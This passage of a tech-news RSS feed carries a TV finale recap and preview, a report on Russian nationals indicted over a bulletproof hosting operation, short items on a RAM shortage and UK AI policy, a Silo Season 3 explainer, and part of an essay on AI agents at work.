<description><![CDATA[Maximum Pleasure Guaranteed Episode 10 confirms that Detective Baxter survived the gunshot fired by Jennifer in the woods. However, his survival creates another serious problem for the Souter Group, which quickly begins removing anyone who can expose its operation.



Major spoilers for Episode 1...]]></description>
<link>https://tsecurity.de/de/3670572/ios-mac-os/maximum-pleasure-guaranteed-episode-10-recap-who-survived-the-gunshot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670572/ios-mac-os/maximum-pleasure-guaranteed-episode-10-recap-who-survived-the-gunshot/</guid>
<pubDate>Wed, 15 Jul 2026 14:09:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maximum Pleasure Guaranteed Episode 10 confirms that Detective Baxter survived the gunshot fired by Jennifer in the woods. However, his survival creates another serious problem for the Souter Group, which quickly begins removing anyone who can expose its operation.



Major spoilers for Episode 10, “Queens,” follow.




Episode title: Queens



Release date: July 15, 2026



Streaming platform: Apple TV



Genre: Dark comedy, crime and thriller



Duration: Around 38 minutes



Season: Season 1, Episode 10



Main cast: Tatiana Maslany, Jake Johnson, Dolly de Leon, Murray Bartlett, Jon Michael Hill, Charlie Hall and Kiarra Hamagami Goldberg




Episode 10 serves as the Season 1 finale of the ten-part Apple TV series. It continues immediately after Jennifer shoots Baxter and escapes, while Paula enters the Souter Group’s private gathering to confront Cecilia.



Did Detective Baxter Survive the Gunshot?



Yes, Detective Baxter survives.



The finale later shows Baxter waking up in a hospital bed with Detective Gonzalez beside him. Gonzalez promises that they will discover what really happened, suggesting that the police investigation into Jennifer and the Souter Group remains active.



Baxter’s survival makes Jennifer dangerous to the people who hired her. She can now face charges for shooting a police officer, and Baxter can help identify her. The Souter Group also knows that Jennifer has enough information to expose the people behind the murders, surveillance and blackmail operation.



Jennifer believes completing the job against Paula will restore her position. However, Brian approaches her while she sits inside her car and shoots her several times. He then reports that the assignment has been completed. Jennifer does not survive the finale.



Paula Confronts Cecilia



Paula reaches Cecilia and explains that she has uncovered the connection between Trevor, Dennis and the Souter Group. The company publicly presents itself as a risk-advisory business, but Paula believes it secretly uses surveillance, threats and violence to influence events for powerful clients.



Paula cannot prove every part of the conspiracy, although she has evidence that Dennis bribed Joyce to help Cecilia’s son enter Yale. She threatens to expose that information unless Cecilia protects her and Hazel.



Cecilia appears to accept the deal because Paula soon receives exactly what she needs. The murder case against her disappears, and the company creates another suspect.



Dennis Survived His Shooting, but Does Not Survive the Finale



The episode reveals that Dennis survived after Paula shot him in the face. His injuries left him badly disfigured, while the Souter Group secretly kept him alive until it needed someone to blame.



Two workers take Dennis to a rooftop, place a false suicide note in his pocket and push him from the building. The note claims that he killed Trevor and Sky, which allows the police to close the case and clear Paula.



Therefore, Baxter and Dennis both survived their original gunshot wounds, although Dennis is later killed.



Does Paula Win Custody of Hazel?



Paula also survives the custody hearing against Karl and Mallory. Their lawyer raises her relationship with Trevor, her drinking and the mysterious Portland incident.



Paula admits that she struggled after her divorce, but she explains that loneliness and personal mistakes do not make her an unfit mother. The judge rules in her favour, allowing Hazel to remain in New York under the existing custody arrangement.



What Does the Final Scene Mean?



Paula’s victory does not last long.



An unknown person sends her security footage from Portland. The video appears to show Paula deliberately driving into Caleb, revealing that she played a direct role in his death. The sender tells Paula that they now control her and expect her to complete a favour.



Paula finally answers the phone as the season ends. The scene suggests that Cecilia spared Paula because the Souter Group sees value in her research skills and wants to force her into working for them. However, the identity of the caller remains unconfirmed.



Maximum Pleasure Guaranteed Episode 10 answers the gunshot cliffhanger while opening a much larger mystery around Paula’s past. What did you think about the finale, and do you plan to watch a possible second season? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure]]></title>
<description><![CDATA[Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled ransomware, malware, phishing, and other cybercriminal activities, resulting in more than $62 million in losses to victims acros...]]></description>
<link>https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</guid>
<pubDate>Wed, 15 Jul 2026 07:06:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Three Russian cybercrime indictment" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="443" data-end="800">Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled <a href="https://thecyberexpress.com/ransomware-sanctions-target-vpn/" target="_blank" rel="noopener">ransomware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-avrecon-malware/" target="_blank" rel="noopener">malware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-malicious-traffic/" target="_blank" rel="noopener">phishing</a>, and other cybercriminal activities, resulting in more than $62 million in losses to victims across the United States and several other countries.</p>
<p data-start="802" data-end="1133">The U.S. Attorney's Office for the Northern District of Ohio announced the unsealing of the indictment following a seven-year investigation. Alongside the criminal charges, the U.S. Department of State is offering a <a href="https://rewardsforjustice.net/rewards/media-land/" target="_blank" rel="nofollow noopener">reward of up to $10 million </a>for information on foreign government-linked associates connected to the operation.</p>

<h3 data-section-id="1cu3nlp" data-start="1135" data-end="1188"><strong>Three Russian Nationals and Two Companies Indicted</strong></h3>
<p data-start="1190" data-end="1260">A federal grand jury returned the indictment in December 2024 against:</p>

<ul data-start="1262" data-end="1481">
 	<li data-section-id="11gkvxj" data-start="1262" data-end="1328">Alexander Alexandrovich Volosovik, 43, of St. Petersburg, Russia</li>
 	<li data-section-id="1lbppu8" data-start="1329" data-end="1389">Kirill Andreevich Zatolokin, 34, of St. Petersburg, Russia</li>
 	<li data-section-id="1myt66t" data-start="1390" data-end="1449">Yulia Vladimirovna Pankova, 29, of St. Petersburg, Russia</li>
 	<li data-section-id="byn7yg" data-start="1450" data-end="1466">Media Land LLC</li>
 	<li data-section-id="qi6id" data-start="1467" data-end="1481">ML.Cloud LLC</li>
</ul>
<p data-start="1483" data-end="1624">The defendants face charges including conspiracy to commit computer <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28967">fraud</a>, wire fraud, money laundering, and aiding cybercriminal activities.</p>
<p data-start="1483" data-end="1624"><img class="aligncenter wp-image-113102 size-full" src="https://thecyberexpress.com/wp-content/uploads/Russian-cybercrime-indictment-e1784090682124.webp" alt="Russian cybercrime indictment" width="600" height="410"></p>
<p data-start="1626" data-end="1832">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28964">General</a> A. Tysen Duva <a href="https://www.justice.gov/usao-ndoh/pr/three-russian-nationals-indicted-international-cybercrimes-resulting-more-62m-losses" target="_blank" rel="nofollow noopener">said</a> the defendants allegedly operated criminal infrastructure from overseas that supported attacks against U.S. critical institutions and placed the public at risk.</p>

<h3 data-section-id="coypn0" data-start="1834" data-end="1900"><strong><span role="text">Bulletproof Hosting Allegedly Enabled Cybercrime Operations</span></strong></h3>
<p data-start="1902" data-end="2111">According to court documents, Media Land, owned by Volosovik, and ML.Cloud, owned by Pankova, provided <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28970">internet</a> infrastructure and server hosting services designed to help cybercriminals evade law enforcement.</p>
<p data-start="2113" data-end="2296">Authorities allege the companies operated from St. Petersburg while maintaining infrastructure in multiple countries, including China, Finland, the Netherlands, and the United States.</p>
<p data-start="2298" data-end="2577">The businesses allegedly offered bulletproof hosting services that enabled criminal clients to deploy malware and ransomware, extort victims for money and <a href="https://thecyberexpress.com/cryptocurrency-mixing-service-bitcoin-seized/" target="_blank" rel="noopener">cryptocurrency</a>, register fraudulent domains, operate criminal marketplaces, and launch phishing and brute-force attacks.</p>
<p data-start="2579" data-end="2738">Investigators said the companies also provided technical support to cybercriminal customers, allowing malicious campaigns to continue while avoiding detection.</p>

<h3 data-section-id="108i6jp" data-start="2740" data-end="2792"><strong>Victims Spanned Critical Sectors Across 21 States</strong></h3>
<p data-start="2794" data-end="2908">Officials said the operation targeted dozens of organizations across 21 U.S. states as well as multiple countries.</p>
<p data-start="2910" data-end="2927">Victims included:</p>

<ul data-start="2929" data-end="2998">
 	<li data-section-id="16y39h9" data-start="2929" data-end="2936">Banks</li>
 	<li data-section-id="1tvaq5r" data-start="2937" data-end="2946">Schools</li>
 	<li data-section-id="1khey9s" data-start="2947" data-end="2968">Government entities</li>
 	<li data-section-id="1k0ubkf" data-start="2969" data-end="2980">Hospitals</li>
 	<li data-section-id="1q2cyct" data-start="2981" data-end="2998">Media companies</li>
</ul>
<p data-start="3000" data-end="3124">Communities affected in Ohio included Akron, Brookfield, Canton, Cleveland, Elyria, Medina, Findlay, Solon, and Valley View.</p>
<p data-start="3000" data-end="3124"><img class="aligncenter wp-image-113103 size-full" src="https://thecyberexpress.com/wp-content/uploads/3-Russian-cybercrime-indictment-e1784090783177.webp" alt="Russian cybercrime indictment" width="600" height="400"></p>
<p data-start="3126" data-end="3384">Additional affected states included California, Florida, Georgia, Illinois, Louisiana, Maryland, Massachusetts, Michigan, Minnesota, New Hampshire, New York, North Carolina, Pennsylvania, Tennessee, Texas, Utah, Virginia, Washington, Wisconsin, and Delaware.</p>
<p data-start="3386" data-end="3515">International victims were identified in Australia, Canada, the European Union, the United Arab Emirates, and the United Kingdom.</p>
<p data-start="3517" data-end="3715"><a href="https://thecyberexpress.com/e-note-crypto-exchange-seized/" target="_blank" rel="noopener">FBI Cyber Division</a> Assistant Director Brett Leatherman said Media Land enabled malicious activity that caused tens of millions of dollars in losses while impacting victims across multiple countries.</p>

<h3 data-section-id="10nhdi" data-start="3717" data-end="3750"><strong>Russian Cybercrime Indictment Prompts $10 Million Reward Offer</strong></h3>
<p data-start="3752" data-end="4051">The U.S. Department of State's Rewards for Justice program announced a reward of up to $10 million for actionable information regarding foreign government-linked associates of the indicted individuals, their malicious <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28968">cyber</a> activities, or foreign government-linked use of Media Land or ML.Cloud.</p>
<p data-start="4053" data-end="4147">The program also noted that relocation assistance may be available for qualifying information.</p>

<h3 data-section-id="atkbpo" data-start="4149" data-end="4191"><strong>International Sanctions Expand Pressure</strong></h3>
<p data-start="4193" data-end="4279">The indictment follows coordinated international action against the alleged operators. In November 2025, the U.S. Department of the Treasury's Office of Foreign Assets Control, together with authorities from the United Kingdom and Australia, sanctioned Media Land for facilitating global <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28963">ransomware</a> operations, distributed denial-of-service attacks, and other malicious cyber activities.</p>
<p data-start="4583" data-end="4785">The sanctions also targeted Volosovik, Zatolokin, and Pankova individually, along with Media Land subsidiaries Media Land Technology (MLT), <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="Data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28965">Data</a> Center Kirishi (DC Kirishi), and sister company ML Cloud.</p>
<p data-start="4787" data-end="4949">On July 13, the <a href="https://thecyberexpress.com/chat-control-1-0-returns-after-euro-parliament/" target="_blank" rel="noopener">European Union</a> also announced sanctions against the companies and key individuals as part of broader efforts to disrupt cybercrime infrastructure.</p>

<h3 data-section-id="1avn398" data-start="4951" data-end="4999"><strong>International Agencies Back the Investigation</strong></h3>
<p data-start="5001" data-end="5176">The investigation was led by the FBI Cleveland Division with support from the <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="Cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28966">Cybersecurity</a> and Infrastructure Security Agency (CISA) and the Office of Foreign Assets Control.</p>
<p data-start="5178" data-end="5509">Authorities also received assistance from the National Police of the Netherlands, the Public Prosecutor's Office of the Netherlands, the United Kingdom's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28969">Crime</a> Agency, the United Kingdom Foreign Commonwealth and Development Office, the Australian Department of Foreign Affairs and Trade, and the Australian Federal Police.</p>
<p data-start="5511" data-end="5814" data-is-last-node="" data-is-only-node="">Officials from <a href="https://thecyberexpress.com/cisa-cve-2026-48939-cve-2026-56291/" target="_blank" rel="noopener">CISA</a> and partner agencies said disrupting bulletproof hosting providers remains essential because these services form a critical part of the cybercriminal ecosystem by enabling ransomware, phishing, malware, and other malicious operations while helping threat actors remain anonymous.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CEO of big memory chip maker says 2027 could be the 'worst year in the industry's history' — and other RAM crisis rumblings back up that dire prediction]]></title>
<description><![CDATA[Fresh RAM misery, including a seriously gloomy forecast from the boss of a big chip maker, intensifies fears that this crisis is here to stay.]]></description>
<link>https://tsecurity.de/de/3668841/it-nachrichten/ceo-of-big-memory-chip-maker-says-2027-could-be-the-worst-year-in-the-industrys-history-and-other-ram-crisis-rumblings-back-up-that-dire-prediction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668841/it-nachrichten/ceo-of-big-memory-chip-maker-says-2027-could-be-the-worst-year-in-the-industrys-history-and-other-ram-crisis-rumblings-back-up-that-dire-prediction/</guid>
<pubDate>Tue, 14 Jul 2026 20:11:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fresh RAM misery, including a seriously gloomy forecast from the boss of a big chip maker, intensifies fears that this crisis is here to stay.]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Episode 10: Release Date and What to Expect]]></title>
<description><![CDATA[The Maximum Pleasure Guaranteed finale will be released on Apple TV on Wednesday, July 15, 2026. Episode 10 will conclude Paula Sanders’ dangerous investigation after a season filled with murder, blackmail, family problems, and increasingly risky decisions.



Finale Release Details




Finale re...]]></description>
<link>https://tsecurity.de/de/3668621/ios-mac-os/maximum-pleasure-guaranteed-episode-10-release-date-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668621/ios-mac-os/maximum-pleasure-guaranteed-episode-10-release-date-and-what-to-expect/</guid>
<pubDate>Tue, 14 Jul 2026 18:18:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Maximum Pleasure Guaranteed finale will be released on Apple TV on Wednesday, July 15, 2026. Episode 10 will conclude Paula Sanders’ dangerous investigation after a season filled with murder, blackmail, family problems, and increasingly risky decisions.



Finale Release Details




Finale release date: Wednesday, July 15, 2026



Episode: Season 1, Episode 10



Episode title: “Queens”



Streaming platform: Apple TV



Genre: Dark comedy and thriller



Season length: 10 episodes



Typical duration: Around 30 minutes



Created by: David J. Rosen



Directed by: David Gordon Green



Main cast: Tatiana Maslany, Jake Johnson, Jessy Hodges, Dolly de Leon, Jon Michael Hill, Charlie Hall, Kiarra Hamagami Goldberg, Nola Wallace, Brandon Flynn, and Murray Bartlett




Apple premiered the first two episodes on May 20 before releasing one episode every Wednesday. The weekly schedule ends with Episode 10 on July 15.



What Time Will the Maximum Pleasure Guaranteed Finale Be Released?



Apple lists July 15 as the official Maximum Pleasure Guaranteed finale release date. However, Apple TV frequently makes new episodes available at approximately 9 p.m. Eastern Time on the previous evening in the United States.



Viewers should therefore check Apple TV from Tuesday night, July 14, depending on their location. In India, the finale should appear during the morning of Wednesday, July 15, although the exact availability can differ slightly by account and region.



Where Is the Story Heading Before Episode 10?



Spoilers ahead for Maximum Pleasure Guaranteed Season 1.



Paula started the season as a newly divorced mother facing a custody dispute and an identity crisis. Her life changed after she became convinced that she had witnessed a serious crime during an online encounter.



Her attempt to uncover the truth pulled her into a larger mystery involving blackmail, violence, suspicious packages, and people who repeatedly questioned her judgement. At the same time, every new discovery affected her relationship with her daughter Hazel, her former husband Karl, and Karl’s new partner, Mallory.



By the end of Episode 9, the investigation had reached its most dangerous stage. Paula had collected enough information to believe that the events surrounding her were connected, but proving the conspiracy remained difficult. The episode left several characters facing immediate danger while Paula moved closer to the person responsible.



What Can Viewers Expect From the Finale?



The finale will need to resolve the central mystery surrounding the crime Paula believes she witnessed. It should also reveal whether her investigation saves her family or creates another problem she cannot easily escape.



Episode 10 is also expected to address Paula’s custody battle and her strained relationship with Hazel. Those personal issues have remained closely connected to the investigation throughout the season, since Paula’s actions have repeatedly raised questions about her stability and decision-making.



Rudy and Geri’s storyline could also receive an important conclusion. Their partnership developed while they helped investigate the case, and their growing connection became one of the season’s lighter elements. However, Geri’s secrets have created uncertainty about where their relationship is heading.



Will There Be a Maximum Pleasure Guaranteed Season 2?



Apple has not announced Maximum Pleasure Guaranteed Season 2 at the time of writing. The series was introduced as a 10-episode season rather than a confirmed limited series, leaving room for another chapter if the finale keeps part of the story open.



The decision will likely depend on viewership, audience response, and whether the creators have another story planned for Paula. For now, Episode 10 serves as the final confirmed episode.



The Maximum Pleasure Guaranteed finale streams on Apple TV on July 15. What do you plan to watch after the season ends? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[The UK wants to catch up in the global AI race – but is too wary of risks to go all-in]]></title>
<description><![CDATA[UK fears a ‘triple whammy’: oversized investment in AI stocks, slower adoption of AI than predicted and the breakneck pace of AI’s developmentHello, and welcome to TechScape. I’m your host, Blake Montgomery, US tech editor at the Guardian. Today, we’re discussing the UK’s difficult position in th...]]></description>
<link>https://tsecurity.de/de/3668192/it-nachrichten/the-uk-wants-to-catch-up-in-the-global-ai-race-but-is-too-wary-of-risks-to-go-all-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668192/it-nachrichten/the-uk-wants-to-catch-up-in-the-global-ai-race-but-is-too-wary-of-risks-to-go-all-in/</guid>
<pubDate>Tue, 14 Jul 2026 16:02:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>UK fears a ‘triple whammy’: oversized investment in AI stocks, slower adoption of AI than predicted and the breakneck pace of AI’s development</p><p>Hello, and welcome to TechScape. I’m your host, Blake Montgomery, US tech editor at the Guardian. Today, we’re discussing the UK’s difficult position in the AI race, new doubts over OpenAI’s path toward a trillion-dollar stock market debut and the changes to IRL tech reporting in the age of AI.</p><p><a href="https://www.theguardian.com/commentisfree/2026/jul/08/chatgpt-ai-therapy">My patients use ChatGPT for therapy. Now I use it too | Sarah Darghouth | The Guardian</a></p><p><a href="https://www.theguardian.com/technology/ng-interactive/2026/jul/12/software-developers-engineers-ai">Chasing new skills, going back to basics and pushing for collective action: how software engineers are adapting to AI</a></p> <a href="https://www.theguardian.com/technology/2026/jul/13/uk-catch-up-global-ai-race-risks">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3’s Two Timelines Explained: How the Past Changes Everything]]></title>
<description><![CDATA[Silo Season 3 follows two timelines separated by more than three centuries, with Juliette Nichols fighting for the truth inside Silo 18 while new characters reveal how the underground world began.




Release date: July 3, 2026



Streaming platform: Apple TV



Episodes: 10



Release schedule: ...]]></description>
<link>https://tsecurity.de/de/3667780/ios-mac-os/silo-season-3s-two-timelines-explained-how-the-past-changes-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667780/ios-mac-os/silo-season-3s-two-timelines-explained-how-the-past-changes-everything/</guid>
<pubDate>Tue, 14 Jul 2026 13:39:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 follows two timelines separated by more than three centuries, with Juliette Nichols fighting for the truth inside Silo 18 while new characters reveal how the underground world began.




Release date: July 3, 2026



Streaming platform: Apple TV



Episodes: 10



Release schedule: New episode every Friday



Season finale: September 4, 2026



Genre: Science fiction, dystopian drama and political thriller



Based on: Hugh Howey’s Silo novel trilogy



Main cast: Rebecca Ferguson, Common, Tim Robbins, Chinaza Uche and Alexandria Riley



New cast: Ashley Zukerman, Jessica Henwick, Jessica Brown Findlay, Morven Christie, Laura Innes, Reed Birney, Matt Craven and Colin Hanks




Apple has confirmed that Season 3 continues the present-day crisis inside Silo 18 while introducing an origin story set centuries earlier. The two stories initially appear separate, but both explore memory loss, political control and the decisions that eventually forced humanity underground.



Spoilers Ahead for Silo Season 3



The present-day timeline begins after Juliette returns to Silo 18 and prevents its residents from walking outside. Her survival should make her the most trusted person in the silo, but she wakes with major gaps in her memory.



Juliette can no longer clearly remember Bernard, the rebellion or the events that brought her home. Robert Sims and Camille use her condition to influence what she believes, while medication appears to weaken her remaining memories. Even so, brief images from her past suggest that the truth has not disappeared completely.



The Present Timeline Follows Juliette in Silo 18



The first timeline takes place roughly 352 years after the event that destroyed the outside world. Juliette now holds an important position inside Silo 18, but her memory loss leaves her vulnerable to the people controlling information.



Her storyline also reveals a larger plan involving memory manipulation. The Algorithm appears prepared to erase memories across multiple silos through drugs placed in their water supply.



This explains why earlier generations forgot rebellions, historical records and details about the outside world. Juliette’s resistance to the treatment could help her uncover how the silos have controlled their populations for centuries.



The Before Times Reveal How the Crisis Started



The second timeline takes viewers back to Washington, D.C., before the silos became humanity’s permanent home.



Congressman Daniel Keene becomes involved in a political conspiracy connected to an alleged Iranian attack on American soil. His sister Charlotte, a fighter pilot, returns from a secret mission involving a strange substance and begins experiencing memory problems.



Their story turns the series into a political thriller as government officials, military operations and secret experiments move closer to the event that ended normal life on the surface. Showrunner Graham Yost said this section draws inspiration from paranoid thrillers of the 1970s.



How the Two Silo Season 3 Timelines Connect



Memory loss provides the clearest connection between the timelines.



Charlotte experiences missing memories in the Before Times, while Juliette faces similar problems centuries later. This suggests that the technology used to control people inside the silos existed before the underground communities were created.



Daniel and Charlotte’s investigation should eventually explain who designed the silos, why people entered them and how the Algorithm gained control. Meanwhile, Juliette’s story shows the long-term consequences of those decisions.



The timelines are moving toward the same central answer: someone planned the silo system before the world ended, and memory manipulation helped keep that system alive for more than 300 years.



Silo Season 3 releases new episodes every Friday on Apple TV through September 4. What do you think connects Juliette, Charlotte and the creation of the silos? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI agents are shaping the future of work]]></title>
<description><![CDATA[I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing function...]]></description>
<link>https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing functionality.  </p>



<p class="wp-block-paragraph">At the end of 2025, Anthropic and OpenAI launched new AI models and code-generating capabilities. More developers tried <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, and some platforms launched <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development capabilities</a>. By February 2026, even The New York Times reported that <a href="https://www.nytimes.com/2026/02/18/opinion/ai-software.html">the AI disruption had arrived</a>, noting that code generators were building “apps that may be flawed, but credible.”</p>



<p class="wp-block-paragraph">Wall Street investors took notice of the code-generation improvements and other disruptive factors, driving a selloff in SaaS stocks, now referred to as the “<a href="https://www.bloomberg.com/news/articles/2026-02-03/-get-me-out-traders-dump-software-stocks-as-ai-fears-take-hold">SaaSpocalypse</a>.” Part of their concern stemmed from the belief that CIOs would use AI to <a href="https://www.cio.com/article/4148303/cios-rethink-softwares-future-as-ai-agents-advance.html">write software that would replace SaaS solutions</a>.</p>



<h2 class="wp-block-heading">AI innovations from SaaS and solution providers</h2>



<p class="wp-block-paragraph">But I thought differently and wrote a response in my article asking whether <a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is the end of SaaS as we know it</a>. CIOs might use AI to accelerate application modernization, but I doubt they would replace their ERP, CRM, and even smaller SaaS point solutions by building them.</p>



<p class="wp-block-paragraph">Instead, I believed it would be SaaS companies that would take the most advantage of AI code-generation capabilities.</p>



<p class="wp-block-paragraph">This hypothesis drove me to attend nine conferences this spring to see how SaaS companies were launching AI agents and defining a new future of work. I wrote eight articles on <a href="https://drive.starcio.com/cios-need-to-know">what CIOs need to know</a> about data management, agile organizations, marketing, ERPs, critical process management, and other evolutions to plan for in the AI era.</p>



<p class="wp-block-paragraph">Now, looking across all nine conferences, I can draw some conclusions about how AI agents are shaping the future of work. Here are my learnings and what CIOs need to consider when evaluating and deploying AI agents in the workplace.</p>



<h2 class="wp-block-heading">Agentic, human-in-the-middle, or augmenting human?</h2>



<p class="wp-block-paragraph">SaaS companies have very distinct perspectives on the future of work, including the extent to which humans will play which roles and whether and how quickly we’ll see agentic, fully automated work.</p>



<p class="wp-block-paragraph">For example, Atlassian proclaimed, “<a href="https://www.atlassian.com/company/events">step into the future of human-AI collaboration</a>,” while SAP unveiled “<a href="https://news.sap.com/2026/05/sap-sapphire-sap-unveils-autonomous-enterprise/">the autonomous enterprise</a>.” Snowflake aimed to “<a href="https://www.snowflake.com/en/summit/">make AI real for business</a>,” while Appian targeted “<a href="https://www.appianworld.com/">serious AI built on process</a>.”</p>



<p class="wp-block-paragraph">These vendors’ marketers had to decide whether to lead with AI, people, or business in their messaging, but so must CIOs as they contemplate their AI strategies and how to get employees to fully adopt AI agents.</p>



<p class="wp-block-paragraph">Some CIOs see a fully automated agentic AI as the future, with human-in-the-middle as a transitional phase as departments build trust in AI agents’ decision-making and automation capabilities.</p>



<p class="wp-block-paragraph">Other CIOs see AI more as a tool that delivers productivity improvements by augmenting human decision-making capabilities. Many of these CIOs see human augmentation as essential to supporting critical thinking, innovation, and creativity.</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI Report</a>, published in January, provides a benchmark. It states that 36% of IT leaders expect at least 10% of their jobs to be fully automated in the next year, and 82% expect to reach that benchmark in three years.</p>



<p class="wp-block-paragraph">Many organizations will have a mix of AI agents, choosing automation where reliability at scale is possible, but opting for human augmentation in operationally critical or customer-facing domains. But how CIOs position AI agents is not only an operational strategy; it’s also a cultural statement that shapes employees’ embrace of AI and whether <a href="https://drive.starcio.com/2026/03/ai-leadership-job-at-risk-or-career-opportunity/">detractors vocalize job-loss fears</a>.</p>



<p class="wp-block-paragraph">In the short term, it will also weigh in on which AI agents to use from different partners and which areas to build in-house.</p>



<h2 class="wp-block-heading">Many options to test and deploy AI agents</h2>



